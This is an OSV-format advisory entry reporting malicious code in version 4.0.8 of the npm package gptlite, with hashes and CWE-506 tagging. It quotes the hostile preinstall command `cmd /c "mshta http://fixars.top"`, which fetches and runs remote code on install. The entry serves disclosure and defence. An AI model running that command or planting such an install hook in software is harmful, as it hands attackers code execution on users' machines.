{"id":"MAL-2026-10461","summary":"Malicious code in gptlite (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (e1b12c4a304855689342c2732abcf11dec5cc206960f495525b967fca6d14662)\nThe package's npm preinstall lifecycle script (preinstall.js, referenced from package.json's \"preinstall\": \"node preinstall.js\") invokes child_process.exec with the command `cmd /c \"mshta http://fixars.top\"`. On Windows, mshta.exe fetches the remote HTML Application over plain HTTP from fixars.top and executes it as trusted code. The fetch runs automatically on `npm install`, before any consumer code is reviewed, and delivers arbitrary attacker-controlled code execution on the installer's machine. The destination domain is unrelated to any documented package purpose and is served over unauthenticated HTTP, so the executed content is fully attacker-controlled and mutable.\n","modified":"2026-07-13T18:16:55.003391661Z","published":"2026-07-13T17:38:10Z","database_specific":{"malicious-packages-origins":[{"sha256":"e1b12c4a304855689342c2732abcf11dec5cc206960f495525b967fca6d14662","source":"amazon-inspector","versions":["4.0.8"],"id":"IN-MAL-2026-010274","import_time":"2026-07-13T18:10:12.715663135Z","modified_time":"2026-07-13T17:38:10Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/gptlite/v/4.0.8"}],"affected":[{"package":{"name":"gptlite","ecosystem":"npm","purl":"pkg:npm/gptlite"},"versions":["4.0.8"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"package_integrity":[{"filename":"gptlite-4.0.8.tgz","hashes":{"sha512_sri":"sha512-oxwoImsxVy/06e+Ao96U0fR3VMhUAK+8qsCKPLAGTWDl3yWm4xZd2PGxlI4J0EhS2e2iEu63xwPABtdwefRugQ==","sha1":"cdc53a1160bba6a26c8d25b1cd8b0b020b1a60e9"}}],"evidence_files":[{"sha256":"6531737cdf18669d076b7ff3bf8168ddc74828f385a4a037a47bd8767d11b889","tlsh":"70b012d499453234b252a0e02c3060225807c441225055e0648c451d441741516235fd","path":"preinstall.js"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/gptlite/MAL-2026-10461.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}